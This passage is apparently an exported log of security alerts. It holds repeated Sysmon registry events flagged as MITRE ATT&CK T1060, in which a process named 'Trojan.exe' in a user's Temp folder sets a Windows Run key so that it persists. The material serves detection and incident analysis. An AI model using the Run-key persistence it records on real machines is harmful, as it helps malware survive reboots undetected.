..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:27.108037400Z"",""eventRecordID"":""1914"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:27.106\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:27.106"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:29.471",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:26.090 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:26.093397400Z"",""eventRecordID"":""1913"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:26.090\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:26.090"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:28.455",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:25.074 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:25.076549600Z"",""eventRecordID"":""1911"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:25.074\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:25.074"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:27.440",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:24.043 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:24.050008800Z"",""eventRecordID"":""1909"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:24.043\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:24.043"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:26.408",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:23.012 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:23.013425500Z"",""eventRecordID"":""1908"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:23.012\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:23.012"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:25.408",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:21.981 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:21.983270400Z"",""eventRecordID"":""1907"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:21.981\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:21.981"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:24.346",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:20.964 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:20.966312500Z"",""eventRecordID"":""1906"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:20.964\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:20.964"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:23.330",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:19.934 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:19.939708000Z"",""eventRecordID"":""1904"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:19.934\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:19.934"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:22.346",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:18.918 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:18.920202300Z"",""eventRecordID"":""1897"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:18.918\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:18.918"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:21.330",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:17.902 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:17.904475800Z"",""eventRecordID"":""1896"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:17.902\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:17.902"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:20.267",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:16.871 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:16.873553900Z"",""eventRecordID"":""1895"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:16.871\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:16.871"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:19.236",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:15.840 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 